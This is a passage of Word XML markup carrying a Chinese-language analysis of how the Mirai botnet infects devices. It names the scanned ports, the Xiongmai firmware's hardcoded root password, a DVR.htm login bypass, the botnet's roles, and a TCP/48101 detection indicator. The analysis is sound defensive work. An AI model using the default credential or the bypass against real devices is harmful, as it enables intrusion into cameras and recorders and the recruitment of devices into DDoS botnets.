      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DGA域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，其余域名均已被Mirai作者注册。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3C78" w:rsidRPr="00F63C30" w:rsidRDefault="005E3C78" w:rsidP="00583BC0"/>
    <w:p w:rsidR="00F63267" w:rsidRDefault="00F63267" w:rsidP="009A1AB3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc472191671"/>
      <w:r>
        <w:t>感染原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00324BC2" w:rsidRPr="006C78BA" w:rsidRDefault="00324BC2" w:rsidP="006C78BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C78BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai通过扫描23,2323,5555,6789,7547,23231,37777等端口上的漏洞进行恶意程序植入</w:t>
      </w:r>
      <w:r w:rsidRPr="006C78BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90D0F" w:rsidRDefault="00B90D0F" w:rsidP="00B90D0F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc472191672"/>
      <w:r>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00E61CEE">
        <w:t>(23)</w:t>
      </w:r>
      <w:r>
        <w:t>感染原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="007409B1" w:rsidRDefault="00C87FA2" w:rsidP="00613DA3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521E90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>早期Mirai扫描</w:t>
      </w:r>
      <w:r w:rsidR="00B65ABC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DVR、网络</w:t>
      </w:r>
      <w:r w:rsidR="0030183F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>摄像头等设备的</w:t>
      </w:r>
      <w:r w:rsidRPr="00521E90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23/2323端口，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00521E90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Telnet弱口令种植木马</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1092735990"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00521E90">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00521E90">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00521E90">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 李东宏16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00521E90">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00521E90">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r w:rsidRPr="00521E90">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00521E90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C75900" w:rsidRPr="0022355A" w:rsidRDefault="00613DA3" w:rsidP="00613DA3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00613DA3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以雄迈的NetSurveillance和CMS系列为例，所有的</w:t>
      </w:r>
      <w:r w:rsidR="00706BCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DVR/</w:t>
      </w:r>
      <w:r w:rsidRPr="00613DA3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NVR CMS固件，都开放了telnet服务且不能被禁用。</w:t>
      </w:r>
      <w:r w:rsidR="00C75900">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对Dyn的DDoS攻击中</w:t>
      </w:r>
      <w:r w:rsidR="00C75900">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00C75900">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>有相当一部分流量来自于雄迈生产的设备</w:t>
      </w:r>
      <w:r w:rsidR="00C75900">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C75900" w:rsidRPr="0022355A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>固件内置的登录账号“root”有一个不可变的硬编码密码xc3511。Mirai病毒利用这个弱口令远程控制雄迈的安防设备。</w:t>
      </w:r>
      <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>除了硬编码问题，雄迈许多产品的固件还有越权访问漏洞。因为没有对DVR.htm页面进行校验，攻击者可以绕过登录界面，直接访问DVR.htm，导致视频信息泄漏。Mirai病毒变种利用这个绕过漏洞远程控制雄迈的安防设备</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1462488195"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 匡恩网16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C75900" w:rsidRDefault="00C75900" w:rsidP="00C75900">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B90D0F" w:rsidRDefault="0022355A" w:rsidP="00C75900">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>僵尸网络包含如下角色：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRPr="0061327F" w:rsidRDefault="0061327F" w:rsidP="0061327F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bot</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>扫描执行</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DDoS执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRPr="0061327F" w:rsidRDefault="0061327F" w:rsidP="0061327F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ScanListen</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>收集扫描结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRPr="0061327F" w:rsidRDefault="0061327F" w:rsidP="0061327F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Load</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>植入恶意程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRPr="0061327F" w:rsidRDefault="0061327F" w:rsidP="0061327F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="0061327F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：下发DDoS指令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRDefault="0061327F" w:rsidP="00B90D0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00201D9B" w:rsidRDefault="001D1455" w:rsidP="00324BC2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ScanListen开放端口</w:t>
      </w:r>
      <w:r w:rsidR="00644ED8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>48101</w:t>
      </w:r>
      <w:r w:rsidR="00391F19">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004B0365">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00650281">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ot会同此端口通信以上报</w:t>
      </w:r>
      <w:r w:rsidR="004B0365">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>成功的</w:t>
      </w:r>
      <w:r w:rsidR="00650281">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>扫描结果，</w:t>
      </w:r>
      <w:r w:rsidR="004B0365">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进而交付Load模块进行恶意程序植入，</w:t>
      </w:r>
      <w:r w:rsidR="00391F19">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可据此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidR="00CB7D8E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>疑似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ScanListen主机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRDefault="00CB7D8E" w:rsidP="00201D9B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
